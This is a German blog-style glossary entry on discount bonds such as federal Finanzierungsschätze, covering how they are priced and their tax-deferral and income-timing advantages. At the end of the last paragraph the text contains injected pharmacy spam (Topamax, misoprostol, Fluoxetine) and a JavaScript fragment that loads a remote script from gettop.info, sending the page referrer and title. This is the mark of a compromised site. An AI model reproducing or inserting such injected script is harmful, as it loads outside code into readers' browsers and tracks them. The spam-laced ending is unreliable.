Abzinsungspapiere sind festverzinsliche Wertpapiere mit Zinszahlung zu Laufzeitende

Die Abzinsungspapiere sind eine Variante der festverzinslichen Wertpapiere, die sich nicht etwa durch eine jährliche Zinszahlung auszeichnet, sondern deren Zinsen am Ende der Laufzeit in einem Betrag zusammen mit der Rückzahlung gezahlt werden.

Das gebräuchlichste Beispiel dieser Abzinsungspapiere in Deutschland sind wohl die Finanzierungsschätze des Bundes mit ihrer 1- oder 2-jährigen Laufzeit. Anders als die Bundesobligationen werden diese eben nicht “zu 100%” – also dem Nennwert – gekauft, sondern zu einem abgezinsten Wert. Am deutlichsten wird dies bei einem Finanzierungsschatz mit einem geraden Nennwert, z. B. 1.000,– Euro. Da werden am Tag der Emission, d.h. der Ausgabe des Wertpapiers, wesentlich weniger als 1.000,– Euro bezahlt. Nämlich exakt der volle Wert zum Fälligkeitstag abzüglich der Zinsen für die Laufzeit. So ist also der 1-jährige “1.000er” für 993,50 Euro zu haben, bei zweijähriger Laufzeit für 986,20 Euro.

Da die Verzinsung mathematisch exakt und fair vorgenommen wird stellt sich in diesem Zusammenhang die Frage, worin der Vorteil insbesondere einer zweijährigen Laufzeit liegt ?

Neben der sicheren Verzinsung und der Bonität des -oftmals- staatlichen Emittenten liegt der Vorteil der Abzinszungspapier bzw. -anleihe in einer legalen Verspätung der Steuerzahlung, mit dem Fachbegriff Stundung bezeichnet. Bei einem klassischen, aufgezinsten Festverzinslichen wird die erste Zinszahlung nach einem Jahr geleistet und darauf wird sofort die Quellensteuer erhoben. Dieser sofort abgezogene Steuerbetrag steht somit zur Verzinsung im zweiten Jahr nicht mehr zur Verfügung. Anders ist dies bei den Abzinsungspapieren: Hier fließen die gesamten Zinsen (der 2 Jahre) eben erst bei der Rückzahlung zu und nicht etwa zwischendurch. Man hat also einen Zinseszinseffekt auf die Abgeltungssteuer (ca. 25 % plus Solidaritätszuchglag plus ggf. Kirchensteuer) des ersten Jahres, da man diese erst bei Fälligkeit entrichten muss. Dieser Effekt ist zwar relativ gering, lohnt sich aber insbesondere bei größeren Beträgen.

Der zweite Effekt ist eine gewisse Steuerbarkeit des Einkommens. Stellen Sie sich einmal vor, dass Sie in einem Jahr hohe Einnahmen haben und in einem anderen Jahr schon wissen, dass Sie weniger versteuern müssen. Deshalb kann es sich durchaus lohnen, die Zinszahlungen in das Jahr mit den geringeren Einnahmen zu verlagern. Von den Banken wird dies oftmals vor dem Renteneintritt empfohlen, wenn dann im späteren Jahr entweder Freibeträge nicht ausgeschöpft werden sollen oder im Rückzahlungsjahr so geringe EInkünfte erzielt werden, dass man seine bezahlte Quellensteuer wieder ausbezahlt erhält.

Kennen Sie diese beiden Grundprinzipien, die eine Abzinsungsanleihe noch wertvoller machen, dann können Sie Ihre Nachsteuer-Rendite ganz legal um ein paar Zehntel erhöhen. Das lohnt sich. Buy Topamax on line buy misoprostol Order Fluoxetine s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.